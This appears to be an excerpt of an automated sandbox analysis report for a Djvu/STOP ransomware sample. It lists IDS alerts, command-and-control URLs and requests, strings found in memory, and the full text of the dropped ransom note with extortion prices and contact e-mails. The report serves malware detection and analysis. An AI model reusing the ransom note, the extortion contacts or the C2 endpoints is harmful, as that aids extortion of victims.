              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E3FB98

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49733 -> 175.119.10.231:80
              Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49736 -> 175.119.10.231:80
              Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49737 -> 175.119.10.231:80
              Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49746 -> 175.119.10.231:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://zexeq.com/test2/get.php
              Source: Joe Sandbox ViewIP Address: 172.67.139.220 172.67.139.220
              Source: Joe Sandbox ViewIP Address: 175.119.10.231 175.119.10.231
              Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0046CF10
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952314760.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952507557.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952594991.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: api.2ip.ua
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952218391.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952353931.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952417137.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952433523.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952491269.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952507557.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952579662.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952594991.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385543393.0000000000A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.phpp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/8
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/M
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/MW
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/cWc
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: https://api.2ip.ua/geo.json
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json2X
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json8
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.0000000000886000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json8.
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000003.1756065318.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonP
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000000.00000002.1666081495.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonR
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonT
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1686549549.0000000001338000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonX
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840014089.00000000016D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000004.00000002.1757074104.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1676063255.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/o
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000002.1840069476.0000000001727000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1838466482.0000000001725000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000006.00000003.1839320316.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/s
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1955750028.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
              Source: 30264859306.ttf.2.dr, 37262344671.ttf.2.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKb
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKb0so
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.000000000139A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKbFl
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385857595.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2384267492.0000000000AEA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383586650.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-eyUsqpKbt
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004E22E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_004E22E0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Found ransom note / readme
              Source: C:\Users\user\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-eyUsqpKbFlPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0816JOsiephJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1Jump to dropped file
              Yara detected Babuk Ransomware
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTR
              Yara detected Djvu Ransomware
              Source: Yara matchFile source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLE
              Source: Yara matchFile source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPE
